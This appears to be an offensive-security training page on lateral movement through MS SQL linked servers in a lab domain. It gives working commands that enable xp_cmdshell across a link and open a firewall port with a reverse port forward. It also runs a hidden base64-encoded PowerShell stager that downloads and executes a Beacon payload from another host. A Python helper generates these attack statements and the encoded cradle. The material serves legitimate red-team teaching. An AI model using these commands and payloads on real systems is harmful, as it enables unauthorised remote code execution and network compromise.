# MS SQL Lateral Movement

SQL Server has a concept called "linked servers" (or simply "links"), which lets one instance run queries against an external data source through an OLE DB provider. Many source types are supported, including other SQL Server instances, and a link can point practically anywhere the instance can reach: other domains, other forests, or cloud-hosted servers. A link carries its own credentials, so the remote side may grant far more privilege than the caller holds locally.

We can discover any links that the current instance has (the `rpcout` column tells us whether RPC Out is enabled, which matters later; the newer catalog view `sys.servers` exposes the same information as `is_rpc_out_enabled`):

```
SELECT srvname, srvproduct, rpcout FROM master..sysservers;
```

![](https://files.cdn.thinkific.com/file_uploads/584845/images/3cf/9ba/acf/link.png)

This shows a link to **sql-1.cyberbotic.io**, which we can query using *OpenQuery*. OPENQUERY hands the query string to the linked server, executes it there under the link's credentials, and returns the result set to us:

```
SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'select @@servername');
```

The use of double and single quotes is important when using OpenQuery: the link name is a quoted identifier (double quotes), while the remote query is an ordinary T-SQL string literal (single quotes). Any single quote inside that literal must therefore be doubled, as in the next example.

We can also check the xp\_cmdshell status.

```
SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'SELECT * FROM sys.configurations WHERE name = ''xp_cmdshell''');
```

If xp\_cmdshell is disabled, you won't be able to enable it by executing sp\_configure via OpenQuery, because OPENQUERY only passes through statements that return a rowset. If RPC Out is enabled on the link (the `rpcout` column above; it is off by default when a link is created), then you can run the configuration change remotely with `EXEC ... AT` instead:

```
EXEC('sp_configure ''show advanced options'', 1; reconfigure;') AT [sql-1.cyberbotic.io]
EXEC('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT [sql-1.cyberbotic.io]
```

The square brackets around the link name are required.

Manually querying databases to find links can be cumbersome and time-consuming, especially when links chain across several hops, so you can also use `Get-SQLServerLinkCrawl` from PowerUpSQL to automatically crawl all available links, recording the path taken and the privilege level reached at each server.

```
beacon> powershell Get-SQLServerLinkCrawl -Instance "sql-2.dev.cyberbotic.io,1433"

Version     : SQL Server 2019 
Instance    : SQL-2
CustomQuery : 
Sysadmin    : 1
Path        : {SQL-2}
User        : DEV\bfarmer
Links       : {SQL-1.CYBERBOTIC.IO}

Version     : SQL Server 2019 
Instance    : SQL-1
CustomQuery : 
Sysadmin    : 1
Path        : {SQL-2, SQL-1.CYBERBOTIC.IO}
User        : sa
Links       :
```

This output shows that the link from SQL-2 to SQL-1 authenticates to SQL-1 with the remote login `sa`, so anything we pass through the link runs with sysadmin privileges on SQL-1 regardless of who we are on SQL-2.

To execute a Beacon on SQL-1, we can pretty much repeat the same steps as previously. However, note that SQL-1 may only be able to talk to SQL-2 and not to WKSTN-2 or any other machine in the DEV domain, so we stage the payload from SQL-2 itself: open an inbound port on SQL-2's firewall and use the Beacon's reverse port forward to relay it to the team server's web service.

```
beacon> run hostname
sql-2

beacon> getuid
[*] You are DEV\mssql_svc (admin)

beacon> powershell New-NetFirewallRule -DisplayName "8080-In" -Direction Inbound -Protocol TCP -Action Allow -LocalPort 8080

beacon> rportfwd 8080 127.0.0.1 80
[+] started reverse port forward on 8080 to 127.0.0.1:80
```

Because every layer of OpenQuery quoting doubles the single quotes, a PowerShell one-liner that contains its own quotes quickly becomes unreadable. It's easier to pass the PowerShell as a base64 encoded command (`-enc`, which expects the UTF-16LE encoding of the script) so that no quotes from the payload leak into the SQL.

```
SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'select @@servername; exec xp_cmdshell ''powershell -w hidden -enc aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcwBxAGwALQAyAC4AZABlAHYALgBjAHkAYgBlAHIAYgBvAHQAaQBjAC4AaQBvADoAOAAwADgAMAAvAGIAJwApAA==''')
```

The inclusion of a benign statement at the beginning of the query is required for xp\_cmdshell to trigger: OPENQUERY expects the remote batch to return a result set, and the leading `select @@servername` satisfies that so the provider accepts the batch and the xp\_cmdshell call runs.
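The quoting rules from the OpenQuery and `EXEC ... AT` sections above, and the encoded-command trick, are easy to get wrong by hand. The following Python is an added example written for this page (it is not course code and not part of PowerUpSQL): it builds the T-SQL statements rather than typing them, doubling quotes per hop and producing the `-enc` blob from the plain-text stager. It contacts nothing; you paste its output into your SQL client. The host names `sql-1.cyberbotic.io` and `sql-2.dev.cyberbotic.io` are taken from the page; the third hop `sql-3` in the multi-hop demonstration is a hypothetical link used only to show how the quotes multiply when links are chained.

```python
# Added example for this page (not course or PowerUpSQL code). Builds the T-SQL
# needed to reach xp_cmdshell across linked servers without hand-counting quotes.
# It only produces statements to paste into a SQL client; it contacts nothing.
# Host names sql-1.cyberbotic.io / sql-2.dev.cyberbotic.io come from the page;
# "sql-3" in the multi-hop demo is a hypothetical third link.
import base64


def encode_powershell(command: str) -> str:
    """powershell -enc expects base64 of the command encoded as UTF-16LE."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")


def decode_powershell(blob: str) -> str:
    """Inverse of encode_powershell; handy when triaging an -enc blob in logs."""
    return base64.b64decode(blob).decode("utf-16le")


def tsql_literal(text: str) -> str:
    """Quote text as a T-SQL string literal: every embedded ' becomes ''."""
    return "'" + text.replace("'", "''") + "'"


def openquery(link: str, remote_sql: str) -> str:
    """Pass-through query. The link name is a quoted identifier (double quotes);
    the remote statement is a string literal (single quotes)."""
    return f'SELECT * FROM OPENQUERY("{link}", {tsql_literal(remote_sql)})'


def exec_at(link: str, remote_sql: str) -> str:
    """RPC Out variant (needs rpcout / is_rpc_out_enabled on the link).
    The square brackets around the link name are required."""
    return f"EXEC({tsql_literal(remote_sql)}) AT [{link}]"


def nested_openquery(links: list[str], remote_sql: str) -> str:
    """Chain through several links in hop order (first hop first). Each hop
    wraps the previous statement in another literal, so quotes double per hop."""
    sql = remote_sql
    for link in reversed(links):  # wrap the innermost (last) hop first
        sql = openquery(link, sql)
    return sql


def xp_cmdshell_via_openquery(link: str, os_command: str) -> str:
    """xp_cmdshell through OPENQUERY. The remote batch must return a result
    set, so a benign select precedes the exec, as the page describes."""
    remote = f"select @@servername; exec xp_cmdshell {tsql_literal(os_command)}"
    return openquery(link, remote)


def enable_xp_cmdshell_via_rpc(link: str) -> list[str]:
    """The two EXEC ... AT statements used when RPC Out is enabled."""
    return [
        exec_at(link, "sp_configure 'show advanced options', 1; reconfigure;"),
        exec_at(link, "sp_configure 'xp_cmdshell', 1; reconfigure;"),
    ]


if __name__ == "__main__":
    link = "sql-1.cyberbotic.io"
    # Same stager as the page: fetch /b from the reverse port forward on SQL-2.
    stager = "iex (new-object net.webclient).downloadstring('http://sql-2.dev.cyberbotic.io:8080/b')"
    ps = "powershell -w hidden -enc " + encode_powershell(stager)
    print(openquery(link, "select @@servername"))
    for stmt in enable_xp_cmdshell_via_rpc(link):
        print(stmt)
    print(xp_cmdshell_via_openquery(link, ps))
    # Hypothetical third hop (SQL-2 -> SQL-1 -> sql-3) to show the quote doubling.
    print(nested_openquery([link, "sql-3"], "select @@servername"))
```

Run it and diff the output against the statements on this page; `encode_powershell` reproduces the page's `-enc` blob exactly from the plain-text stager, and `decode_powershell` is the same operation in reverse, which is what you want when you meet such a blob in `xp_cmdshell` or process-creation logs during an investigation.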

```
beacon> link sql-1.cyberbotic.io TSVCPIPE-ae2b7dc0-4ebe-4975-b8a0-06e990a41337
[+] established link to child beacon: 10.10.120.25
```

![](https://files.cdn.thinkific.com/file_uploads/584845/images/066/c4e/679/sql-1-beacon.png)
